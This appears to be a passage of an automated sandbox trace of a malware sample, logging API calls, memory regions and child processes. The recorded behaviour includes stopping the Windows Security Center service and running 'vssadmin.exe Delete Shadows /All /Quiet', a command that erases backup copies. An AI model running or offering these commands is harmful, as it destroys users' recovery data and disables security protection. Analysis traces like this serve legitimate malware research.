[0021.331] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0021.331] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0021.331] _wcsicmp (_String1="stop", _String2="query") returned 2 [0021.331] _wcsicmp (_String1="stop", _String2="queryex") returned 2 [0021.331] _wcsicmp (_String1="stop", _String2="start") returned 14 [0021.331] _wcsicmp (_String1="stop", _String2="pause") returned 3 [0021.331] _wcsicmp (_String1="stop", _String2="interrogate") returned 10 [0021.331] _wcsicmp (_String1="stop", _String2="control") returned 16 [0021.331] _wcsicmp (_String1="stop", _String2="continue") returned 16 [0021.331] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0021.331] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x25f740 [0021.333] OpenServiceW (hSCManager=0x25f740, lpServiceName="wscsvc", dwDesiredAccess=0x20) returned 0x25f6a0 [0021.334] ControlService (in: hService=0x25f6a0, dwControl=0x1, lpServiceStatus=0xafbf0 | out: lpServiceStatus=0xafbf0*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 0 [0021.334] GetLastError () returned 0x426 [0021.334] _itow (in: _Dest=0x426, _Radix=719756 | out: _Dest=0x426) returned="1062" [0021.334] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x426, dwLanguageId=0x0, lpBuffer=0x189380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The service has not been started.\r\n") returned 0x23 [0021.336] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xafb74, nSize=0x2, Arguments=0xafb80 | out: lpBuffer="㴈&\x01") returned 0x49 [0021.518] GetFileType (hFile=0x7) returned 0x2 [0021.518] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xafb48 | out: lpMode=0xafb48) returned 1 [0021.518] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x263d08*, nNumberOfCharsToWrite=0x49, lpNumberOfCharsWritten=0xafb64, lpReserved=0x0 | out: lpBuffer=0x263d08*, lpNumberOfCharsWritten=0xafb64*=0x49) returned 1 [0021.518] LocalFree (hMem=0x263d08) returned 0x0 [0021.518] LocalFree (hMem=0x0) returned 0x0 [0021.519] CloseServiceHandle (hSCObject=0x25f6a0) returned 1 [0021.519] CloseServiceHandle (hSCObject=0x25f740) returned 1 [0021.567] exit (_Code=1062) Thread: id = 43 os_tid = 0xb4c Process: id = "12" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x649da000" os_pid = "0xaec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9c4" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin.exe Delete Shadows /All /Quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000101a7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 713 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 714 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 715 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 716 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 717 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 718 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 719 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 720 start_va = 0x4a510000 end_va = 0x4a55bfff entry_point = 0x4a51829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 721 start_va = 0x774c0000 end_va = 0x77668fff entry_point = 0x774c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 722 start_va = 0x776a0000 end_va = 0x7781ffff entry_point = 0x776a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 723 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 724 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 725 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 726 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 727 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 728 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 729 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 730 start_va = 0x450000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 731 start_va = 0x74bd0000 end_va = 0x74bd7fff entry_point = 0x74bd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 732 start_va = 0x74be0000 end_va = 0x74c3bfff entry_point = 0x74c1f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 733 start_va = 0x74c40000 end_va = 0x74c7efff entry_point = 0x74c6de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 734 start_va = 0x772a0000 end_va = 0x773befff entry_point = 0x0 region_type = private name = "private_0x00000000772a0000" filename = "" Region: id = 735 start_va = 0x773c0000 end_va = 0x774b9fff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 1114 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1115 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1116 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1117 start_va = 0x5d0000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1118 start_va = 0x840000 end_va = 0x84ffff entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 1119 start_va = 0x73fa0000 end_va = 0x73fa6fff entry_point = 0x73fa1230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 1120 start_va = 0x751f0000 end_va = 0x751fbfff entry_point = 0x751f10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1121 start_va = 0x75200000 end_va = 0x7525ffff entry_point = 0x7521a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1122 start_va = 0x75660000 end_va = 0x7574ffff entry_point = 0x75670569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1123 start_va = 0x76430000 end_va = 0x7652ffff entry_point = 0x7644b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1124 start_va = 0x76a20000 end_va = 0x76b2ffff entry_point = 0x76a332d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1125 start_va = 0x76c90000 end_va = 0x76cd5fff entry_point = 0x76c97478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1126 start_va = 0x76ce0000 end_va = 0x76d8bfff entry_point = 0x76cea472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1127 start_va = 0x76e20000 end_va = 0x76eaffff entry_point = 0x76e36343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1128 start_va = 0x76f00000 end_va = 0x76f9cfff entry_point = 0x76f33fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1129 start_va = 0x76fa0000 end_va = 0x76fb8fff entry_point = 0x76fa4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1130 start_va = 0x77200000 end_va = 0x7729ffff entry_point = 0x772149e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1131 start_va = 0x77670000 end_va = 0x77679fff entry_point = 0x776736a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1132 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1133 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1154 start_va = 0x850000 end_va = 0x9d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 1155 start_va = 0x767d0000 end_va = 0x7689bfff entry_point = 0x767d168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1156 start_va = 0x768a0000 end_va = 0x768fffff entry_point = 0x768b158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1157 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1158 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1159 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1160 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1161 start_va = 0x9e0000 end_va = 0xb60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 1162 start_va = 0xb70000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b70000" filename = "" Region: id = 1163 start_va = 0x1f70000 end_va = 0x22b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f70000" filename = "" Thread: id = 34 os_tid = 0xaf0 [0022.032] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x34f824 | out: lpSystemTimeAsFileTime=0x34f824*(dwLowDateTime=0x14bc9460, dwHighDateTime=0x1d35d7b)) [0022.032] GetCurrentProcessId () returned 0xaec [0022.032] GetCurrentThreadId () returned 0xaf0 [0022.032] GetTickCount () returned 0x14a0a [0022.032] QueryPerformanceCounter (in: lpPerformanceCount=0x34f81c | out: lpPerformanceCount=0x34f81c*=326963896) returned 1 [0022.033] GetModuleHandleA (lpModuleName=0x0) returned 0x4a510000 [0022.033] __set_app_type (_Type=0x1) [0022.033] __p__fmode () returned 0x76d831f4 [0022.033] __p__commode () returned 0x76d831fc [0022.033] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5321a6) returned 0x0 [0022.033] __getmainargs (in: _Argc=0x4a534238, _Argv=0x4a534240, _Env=0x4a53423c, _DoWildCard=0, _StartInfo=0x4a534140 | out: _Argc=0x4a534238, _Argv=0x4a534240, _Env=0x4a53423c) returned 0 [0022.034] GetCurrentThreadId () returned 0xaf0 [0022.034] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xaf0) returned 0x60 [0022.034] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76a20000 [0022.034] GetProcAddress (hModule=0x76a20000, lpProcName="SetThreadUILanguage") returned 0x76a4a84f [0022.034] SetThreadUILanguage (LangId=0x0) returned 0x409 [0022.045] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0022.045] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x34f7b4 | out: phkResult=0x34f7b4*=0x0) returned 0x2 [0022.045] VirtualQuery (in: lpAddress=0x34f7eb, lpBuffer=0x34f784, dwLength=0x1c | out: lpBuffer=0x34f784*(BaseAddress=0x34f000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0022.045] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x34f784, dwLength=0x1c | out: lpBuffer=0x34f784*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0022.045] VirtualQuery (in: lpAddress=0x251000, lpBuffer=0x34f784, dwLength=0x1c | out: lpBuffer=0x34f784*(BaseAddress=0x251000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0022.045] VirtualQuery (in: lpAddress=0x253000, lpBuffer=0x34f784, dwLength=0x1c | out: lpBuffer=0x34f784*(BaseAddress=0x253000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0022.045] VirtualQuery (in: lpAddress=0x350000, lpBuffer=0x34f784, dwLength=0x1c | out: lpBuffer=0x34f784*(BaseAddress=0x350000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x100000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0022.045] GetConsoleOutputCP () returned 0x1b5 [0022.046] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0022.046] SetConsoleCtrlHandler (HandlerRoutine=0x4a52e72a, Add=1) returned 1 [0022.046] _get_osfhandle (_FileHandle=1) returned 0x7 [0022.046] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0022.047] _get_osfhandle (_FileHandle=1) returned 0x7 [0022.047] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5341ac | out: lpMode=0x4a5341ac) returned 1 [0022.047] _get_osfhandle (_FileHandle=1) returned 0x7 [0022.047] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0022.048] _get_osfhandle (_FileHandle=0) returned 0x3 [0022.048] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5341b0 | out: lpMode=0x4a5341b0) returned 1 [0022.048] _get_osfhandle (_FileHandle=0) returned 0x3 [0022.048] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0022.049] GetEnvironmentStringsW () returned 0x5e2068* [0022.049] FreeEnvironmentStringsW (penv=0x5e2068) returned 1 [0022.049] GetEnvironmentStringsW () returned 0x5e2068* [0022.050] FreeEnvironmentStringsW (penv=0x5e2068) returned 1 [0022.050] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x34e724 | out: phkResult=0x34e724*=0x68) returned 0x0 [0022.050] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x34e72c, lpData=0x34e730, lpcbData=0x34e728*=0x1000 | out: lpType=0x34e72c*=0x0, lpData=0x34e730*=0x0, lpcbData=0x34e728*=0x1000) returned 0x2 [0022.050] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x34e72c, lpData=0x34e730, lpcbData=0x34e728*=0x1000 | out: lpType=0x34e72c*=0x4, lpData=0x34e730*=0x1, lpcbData=0x34e728*=0x4) returned 0x0 [0022.050] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x34e72c, lpData=0x34e730, lpcbData=0x34e728*=0x1000 | out: lpType=0x34e72c*=0x0, lpData=0x34e730*=0x1, lpcbData=0x34e728*=0x1000) returned 0x2 [0022.050] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x34e72c, lpData=0x34e730, lpcbData=0x34e728*=0x1000 | out: lpType=0x34e72c*=0x4, lpData=0x34e730*=0x0, lpcbData=0x34e728*=0x4) returned 0x0 [0022.050] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x34e72c, lpData=0x34e730, lpcbData=0x34e728*=0x1000 | out: lpType=0x34e72c*=0x4, lpData=0x34e730*=0x40, lpcbData=0x34e728*=0x4) returned 0x0 [0022.050] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x34e72c, lpData=0x34e730, lpcbData=0x34e728*=0x1000 | out: lpType=0x34e72c*=0x4, lpData=0x34e730*=0x40, lpcbData=0x34e728*=0x4) returned 0x0 [0022.050] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x34e72c, lpData=0x34e730, lpcbData=0x34e728*=0x1000 | out: lpType=0x34e72c*=0x0, lpData=0x34e730*=0x40, lpcbData=0x34e728*=0x1000) returned 0x2 [0022.050] RegCloseKey (hKey=0x68) returned 0x0 [0022.050] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x34e724 | out: phkResult=0x34e724*=0x68) returned 0x0 [0022.050] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x34e72c, lpData=0x34e730, lpcbData=0x34e728*=0x1000 | out: lpType=0x34e72c*=0x0, lpData=0x34e730*=0x40, lpcbData=0x34e728*=0x1000) returned 0x2 [0022.050] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x34e72c, lpData=0x34e730, lpcbData=0x34e728*=0x1000 | out: lpType=0x34e72c*=0x4, lpData=0x34e730*=0x1, lpcbData=0x34e728*=0x4) returned 0x0 [0022.050] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x34e72c, lpData=0x34e730, lpcbData=0x34e728*=0x1000 | out: lpType=0x34e72c*=0x0, lpData=0x34e730*=0x1, lpcbData=0x34e728*=0x1000) returned 0x2 [0022.050] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x34e72c, lpData=0x34e730, lpcbData=0x34e728*=0x1000 | out: lpType=0x34e72c*=0x4, lpData=0x34e730*=0x0, lpcbData=0x34e728*=0x4) returned 0x0 [0022.050] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x34e72c, lpData=0x34e730, lpcbData=0x34e728*=0x1000 | out: lpType=0x34e72c*=0x4, lpData=0x34e730*=0x9, lpcbData=0x34e728*=0x4) returned 0x0 [0022.051] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x34e72c, lpData=0x34e730, lpcbData=0x34e728*=0x1000 | out: lpType=0x34e72c*=0x4, lpData=0x34e730*=0x9, lpcbData=0x34e728*=0x4) returned 0x0 [0022.051] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x34e72c, lpData=0x34e730, lpcbData=0x34e728*=0x1000 | out: lpType=0x34e72c*=0x0, lpData=0x34e730*=0x9, lpcbData=0x34e728*=0x1000) returned 0x2 [0022.051] RegCloseKey (hKey=0x68) returned 0x0 [0022.051] time (in: timer=0x0 | out: timer=0x0) returned 0x5a0b3db5 [0022.051] srand (_Seed=0x5a0b3db5) [0022.051] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin.exe Delete Shadows /All /Quiet" [0022.051] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin.exe Delete Shadows /All /Quiet" [0022.051] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a535260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0022.051] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5e2070, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0022.051] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0022.051] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0022.051] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0022.051] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0022.051] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0022.052] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0022.052] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0022.052] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0022.052] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0022.052] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0022.052] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0022.052] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0022.052] GetEnvironmentStringsW () returned 0x5e2280* [0022.052] FreeEnvironmentStringsW (penv=0x5e2280) returned 1 [0022.052] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0022.052] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0022.052] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0022.052] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0022.052] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0022.052] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0022.052] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0022.052] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0022.052] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0022.052] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0022.052] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x34f4f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0022.053] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x34f4f0, lpFilePart=0x34f4ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x34f4ec*="Desktop") returned 0x25 [0022.053] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0022.053] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x34f26c | out: lpFindFileData=0x34f26c) returned 0x5e1ee8 [0022.053] FindClose (in: hFindFile=0x5e1ee8 | out: hFindFile=0x5e1ee8) returned 1 [0022.053] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x34f26c | out: lpFindFileData=0x34f26c) returned 0x5e1ee8 [0022.053] FindClose (in: hFindFile=0x5e1ee8 | out: hFindFile=0x5e1ee8) returned 1 [0022.053] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0022.053] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x34f26c | out: lpFindFileData=0x34f26c) returned 0x5e1ee8 [0022.053] FindClose (in: hFindFile=0x5e1ee8 | out: hFindFile=0x5e1ee8) returned 1 [0022.053] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0022.053] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0022.053] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0022.053] GetEnvironmentStringsW () returned 0x5e40f0* [0022.054] FreeEnvironmentStringsW (penv=0x5e40f0) returned 1 [0022.054] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a535260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0022.054] GetConsoleOutputCP () returned 0x1b5 [0022.090] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0022.090] GetUserDefaultLCID () returned 0x409 [0022.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a534950, cchData=8 | out: lpLCData=":") returned 2 [0022.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x34f630, cchData=128 | out: lpLCData="0") returned 2 [0022.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x34f630, cchData=128 | out: lpLCData="0") returned 2 [0022.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x34f630, cchData=128 | out: lpLCData="1") returned 2 [0022.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a534940, cchData=8 | out: lpLCData="/") returned 2 [0022.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a534d80, cchData=32 | out: lpLCData="Mon") returned 4 [0022.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a534d40, cchData=32 | out: lpLCData="Tue") returned 4 [0022.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a534d00, cchData=32 | out: lpLCData="Wed") returned 4 [0022.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, 